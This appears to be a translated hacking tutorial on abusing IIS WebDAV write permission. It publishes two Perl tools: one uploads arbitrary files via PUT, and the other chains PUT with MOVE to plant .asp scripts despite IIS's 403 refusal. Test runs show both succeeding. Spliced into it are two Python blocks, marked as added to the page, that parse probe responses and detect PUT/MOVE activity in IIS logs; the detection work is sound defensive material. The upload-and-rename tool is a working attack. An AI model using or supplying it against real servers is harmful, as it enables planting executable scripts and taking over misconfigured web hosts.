Everyone has probably seen the article "Remote Analysis of IIS Settings", which analyzes the various IIS settings. Here I analyze the IIS write permission. The following quotes the part of that article that deals with IIS write permission:
Write permission
To test whether web users have write permission on a directory, use the following method: telnet to the server's web port (80) and send this request:
PUT /dir/my_file.txt HTTP/1.1
Host: iis-server
Content-Length: 10
At this point the server returns a 100 (Continue) interim response:
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:00 GMT
Then we type 10 letters:
aaaaaaaaaa
After sending this request, look at the server's reply. If it is a 201 CREATED response:
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:08 GMT
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,
 PROPPATCH, SEARCH, LOCK, UNLOCK
then the write permission of this directory is enabled. (Write may be enabled while anonymous users are still not allowed to use it.) If a directory has both "Write" and "Scripts and Executables" enabled, web users can upload a program and execute it, which is frightening.
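An administrator running this probe against their own server needs to read the reply correctly: the "100 Continue" interim response arrives before the real status line, and the Allow header may be folded over two lines as above. The following Python is an added example for this page, not the original article's code; the two raw responses are constructed from the headers quoted above (the 403 body text is invented), and it reports the final status, whether the write succeeded, and which write-class methods the directory advertises.

```python
"""Parse a raw HTTP response from an IIS write-permission probe and report
what it reveals.

Added example for this page (not the original author's code). The raw
responses below are constructed from the headers quoted on the page; the
Allow header is folded onto a continuation line the way the page shows it."""

# WebDAV / HTTP methods that create, change or remove content on the server.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}

# Constructed sample: the 100 Continue interim response followed by the 201.
RESPONSE_201 = (
    "HTTP/1.1 100 Continue\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Date: Thu, 28 Feb 2002 15:56:00 GMT\r\n"
    "\r\n"
    "HTTP/1.1 201 Created\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Date: Thu, 28 Feb 2002 15:56:08 GMT\r\n"
    "Location: http://iis-server/dir/my_file.txt\r\n"
    "Content-Length: 0\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,\r\n"
    " PROPPATCH, SEARCH, LOCK, UNLOCK\r\n"
    "\r\n"
)

# Constructed sample: the refusal the page shows for a direct .asp upload.
RESPONSE_403 = (
    "HTTP/1.1 100 Continue\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Date: Tue, 04 May 2004 16:45:51 GMT\r\n"
    "\r\n"
    "HTTP/1.1 403 Forbidden\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 44\r\n"
    "\r\n"
    "<html><body>Access is forbidden.</body></html>"   # constructed body
)


def parse_final_response(raw):
    """Return (status_code, headers) for the final, non-1xx response.

    A server may send interim 1xx responses (100 Continue) before the real
    one; each is terminated by a blank line. Skipping them by status code
    is more robust than indexing a fixed line number."""
    text = raw.replace("\r\n", "\n")
    for block in text.split("\n\n"):
        lines = block.split("\n")
        parts = lines[0].split(" ", 2)
        if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
            continue                       # not a status line (e.g. a body)
        code = int(parts[1])
        if 100 <= code < 200:
            continue                       # interim response, keep looking
        headers = {}
        last = None
        for line in lines[1:]:
            if line[:1] in (" ", "\t") and last:
                headers[last] += " " + line.strip()   # folded continuation line
            elif ":" in line:
                name, value = line.split(":", 1)
                last = name.strip().lower()
                headers[last] = value.strip()
        return code, headers
    return None, {}


def advertised_write_methods(headers):
    """Write-class methods listed in the Allow header, sorted."""
    allow = headers.get("allow", "")
    listed = {m.strip().upper() for m in allow.split(",") if m.strip()}
    return sorted(listed & WRITE_METHODS)


def assess_put_probe(raw):
    """Summarise a PUT probe: did the write succeed, and what else is allowed?"""
    code, headers = parse_final_response(raw)
    return {
        "status": code,
        "write_succeeded": code in (200, 201, 204),
        "write_methods": advertised_write_methods(headers),
    }


if __name__ == "__main__":
    print(assess_put_probe(RESPONSE_201))
    print(assess_put_probe(RESPONSE_403))
```

A 201 (or a 200/204 when the file already existed) is the actual evidence that the directory is writable; the Allow list only says which methods the server is willing to accept, so both are reported separately.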
Here is a brief explanation:
PUT /dir/my_file.txt HTTP/1.1
Host: iis-server
Content-Length: 10
PUT: asks the server to store the enclosed entity under the supplied request URL. If the request URL refers to an already existing resource, the enclosed entity is treated as a modified version of the one residing on the origin server. If the request URL does not point to an existing resource, and the URL is capable of being defined as a new resource by the requesting user agent, the origin server creates the resource with that URL.
Host: the host to which the HTTP request is sent.
Content-Length: the length of the entity body, i.e. the size of the uploaded file.
Submitting this by hand with nc (or telnet) is tedious, so we write a simple Perl program to complete the submission. The program opens the file with binmode(); the code is as follows:
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

my $argc = @ARGV;
if ($argc != 4) {
    print "Usage: $0 127.0.0.1 80 kaka.exe /scripts/file.exe\n";
    exit;
}
my $host = $ARGV[0];
my $port = $ARGV[1];
my $file = $ARGV[2];
my $path = $ARGV[3];
my @s    = stat($file);
my $size = $s[7];                          # get the file size
print "$file size is $size bytes\n";
my $sock = IO::Socket::INET->new(Proto    => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => $port) || die "Sorry! Could not connect to $host\n";
print $sock "PUT $path HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n";   # blank line ends the request headers
open(my $fh, "<", $file) || die "can't open $file";
binmode($fh);                              # open the file in binary mode
my $char;
while (read($fh, $char, 1024)) {           # read the file and send it as the body
    print $sock $char;
}
print $sock "\n\n";
my @req = <$sock>;
print "please wait...\n";
sleep(2);
# line 4 of the reply follows the "100 Continue" block and its blank line
if (defined $req[4] && $req[4] =~ /200|201/) {
    print "Upfile succeed!!!";             # success
}
else {
    print "Upfile faile!!!\n\n";
    print @req;                            # on failure, show the server's reply
}
close $sock;
close $fh;
Let's test it:
C:\usr\bin> perl.exe iiswt.pl 127.0.0.1 80 kaka.txt /scripts/kaka.txt
kaka.txt size is 14 bytes
please wait...
Upfile succeed!!!
C:\inetpub\scripts> dir kaka.txt
 Volume in drive C has no label.
 Volume Serial Number is 3CD1-479E
 Directory of C:\inetpub\scripts
2004-05-05  00:37                 14 kaka.txt
               1 File(s)             14 bytes
               0 Dir(s)   3,871,080,448 bytes free
Here we successfully uploaded kaka.txt to the web directory scripts. Because the program opens the file with binmode() (binary mode), it should be able to upload other kinds of files too; let us test an exe file:
C:\usr\bin> perl.exe iiswt.pl 127.0.0.1 80 perl.exe /scripts/perl.exe
perl.exe size is 20535 bytes
please wait...
Upfile succeed!!!
C:\inetpub\scripts> dir perl.exe
 Volume in drive C has no label.
 Volume Serial Number is 3CD1-479E
 Directory of C:\inetpub\scripts
2004-05-05  00:42             20,535 perl.exe
               1 File(s)         20,535 bytes
               0 Dir(s)   3,871,031,296 bytes free
Success, an EXE can be uploaded. Is it possible to upload any file at all? Let's test an ASP file:
C:\usr\bin> perl.exe iiswt.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
kaka.asp size is 4 bytes
please wait...
Upfile faile!!!
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Tue, 04 May 2004 16:45:51 GMT

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/5.0
Date: Tue, 04 May 2004 16:45:51 GMT
Connection: close
Content-Type: text/html
Content-Length: 44
Failure! The server answers with an HTTP/1.1 403 Forbidden error. It seems ASP files cannot be written directly this way; whenever you test it, an HTTP/1.1 403 Forbidden error is returned.
So how can we upload the file types that IIS refuses? Besides PUT, POST and GET, IIS accepts other methods as well (see the Allow header above). We can first upload the local ASP file to the remote web directory as another type, such as TXT, and then rename it to ASP.
We again use nc to submit the test:
D:\> nc 127.0.0.1 80
MOVE /scripts/kaka.txt HTTP/1.1
Host: 127.0.0.1
Destination: http://127.0.0.1/scripts/kaka.asp

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Sun, 05 Oct 2003 09:30:59 GMT
Location: http://127.0.0.1/scripts/x.asp
Content-Type: text/xml
Content-Length: 0
MOVE successfully renamed /scripts/kaka.txt to /scripts/kaka.asp. So by combining PUT and MOVE we can write any file to an IIS directory that has write enabled :). We again use Perl to do it.
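From the defender's side, the PUT-then-MOVE sequence just described leaves a clear trace in the IIS W3C extended log: a successful write-class method, and in particular a MOVE on a file the same client has just PUT. The Python below is an added example for this page, not the author's or any project's code. Its log lines are constructed to mirror the requests shown on the page, and it assumes the default W3C field set, which does not record the Destination header; the rename is therefore inferred from a MOVE of a freshly PUT URI rather than from the target name.

```python
"""Flag WebDAV write activity in IIS W3C extended log lines.

Added example for this page (not the original author's code). The log lines
below are constructed to mirror the PUT and MOVE requests shown on the page;
field names follow the W3C extended log format's #Fields directive, and the
default field set is assumed, which does not record the Destination header."""

import datetime as dt

WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}
SCRIPT_EXTENSIONS = {"asp", "asa", "aspx"}
CHAIN_WINDOW = dt.timedelta(minutes=5)   # PUT followed by MOVE within this window

SAMPLE_LOG = [  # constructed sample, not a real server log
    "#Software: Microsoft Internet Information Services 5.0",
    "#Version: 1.0",
    "#Date: 2004-05-04 16:40:00",
    "#Fields: date time c-ip cs-method cs-uri-stem sc-status",
    "2004-05-04 16:40:12 10.0.0.5 GET /default.htm 200",
    "2004-05-04 16:41:03 10.0.0.7 PUT /scripts/kaka.txt 201",
    "2004-05-04 16:41:05 10.0.0.7 MOVE /scripts/kaka.txt 201",
    "2004-05-04 16:45:51 10.0.0.7 PUT /scripts/kaka.asp 403",
    "2004-05-04 16:50:00 10.0.0.9 PUT /uploads/report.txt 201",
]


def parse_w3c(lines):
    """Yield one dict per data line, keyed by the names from the #Fields line."""
    fields = None
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # field order is declared by the log itself
            continue
        if line.startswith("#"):
            continue                    # other directives (#Software, #Date, ...)
        if fields is None:
            raise ValueError("data line before any #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue                    # malformed line: skip rather than misalign
        yield dict(zip(fields, values))


def detect_webdav_writes(lines):
    """Return a list of (kind, client, method, uri, status) alerts."""
    alerts = []
    recent_puts = {}   # (client, uri) -> time of the last successful PUT
    for rec in parse_w3c(lines):
        when = dt.datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        method = rec["cs-method"].upper()
        uri = rec["cs-uri-stem"].lower()
        status = int(rec["sc-status"])
        client = rec["c-ip"]
        if method not in WRITE_METHODS:
            continue
        if 200 <= status < 300:
            # Any successful write-class method means the directory is writable.
            alerts.append(("webdav_write", client, method, uri, status))
            if method == "PUT":
                recent_puts[(client, uri)] = when
            elif method == "MOVE":
                # The Destination header is not logged, so a MOVE of a file the
                # same client just PUT is the best available signal of a rename
                # into a different (possibly script) extension.
                put_time = recent_puts.get((client, uri))
                if put_time is not None and when - put_time <= CHAIN_WINDOW:
                    alerts.append(("put_move_rename", client, method, uri, status))
        elif status == 403 and method == "PUT" and uri.rsplit(".", 1)[-1] in SCRIPT_EXTENSIONS:
            # IIS refused a direct script upload; still worth recording as an attempt.
            alerts.append(("blocked_script_put", client, method, uri, status))
    return alerts


if __name__ == "__main__":
    for alert in detect_webdav_writes(SAMPLE_LOG):
        print(*alert)
```

Run against a real log, point it at the file's lines instead of SAMPLE_LOG; the parser reads the field order from the #Fields line, so it also works when the server is configured to log more columns than the default set. If Destination were logged as an extra field, the put_move_rename rule could compare extensions directly instead of relying on the time window.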
Testing that writing ASP now succeeds:
C:\usr\bin> perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
************************************************************
codz by ≯superhei
************************************************************
kaka.asp size is 4 bytes
please wait...
Upfile succeed!!!
Modifyfile succeed!!!
The final iiswrite.pl code is as follows (when this article was written, the code was only a first draft written in an Internet cafe; lanker tested it and completed it, thanks lanker):
#!/usr/bin/perl
# The iiswrite script
use strict;
use warnings;
use IO::Socket;

my $argc = @ARGV;
print "*" x 60;
print "\ncodz by ≯superhei\n";
print "*" x 60, "\n";
if ($argc != 4) {
    print "Usage: $0 127.0.0.1 80 kaka.txt /scripts/my_file.txt\n";
    exit;
}
my $host  = $ARGV[0];
my $port  = $ARGV[1];
my $file  = $ARGV[2];
my $path  = $ARGV[3];
my @path  = split("/", $path);
my $any   = pop(@path);                 # file name part of the target (not used)
my $path1 = join("/", @path);           # directory part of the target path
my @s     = stat($file);
my $size  = $s[7];
print "$file size is $size bytes\n";

# Step 1: PUT the file into the target directory under the name lanker.txt
my $sock = IO::Socket::INET->new(Proto    => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => $port) || die "Sorry! Could not connect to $host\n";
print $sock "PUT $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n";
open(my $fh, "<", $file) || die "can't open $file";
binmode($fh);
my $char;
while (read($fh, $char, 1024)) {
    print $sock $char;
}
print $sock "\n\n";
my @req = <$sock>;
print "please wait...\n";
sleep(2);
if (defined $req[4] && $req[4] =~ /200|201/) {
    print "Upfile succeed!!!\n";
}
else {
    print "Upfile faile!!!\n";
}
close $sock;
close $fh;

# Step 2: MOVE (rename) lanker.txt to the requested path
$sock = IO::Socket::INET->new(Proto    => "tcp",
                              PeerAddr => $host,
                              PeerPort => $port) || die "Sorry! Could not connect to $host\n";
print $sock "MOVE $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Destination: http://$host:$port$path\n\n";
@req = <$sock>;
if (defined $req[0] && $req[0] =~ /20\d/) {   # any 2xx status on the MOVE
    print "Modifyfile succeed!!!";
}
else {
    print "Modifyfile faile!!!";
}
close $sock;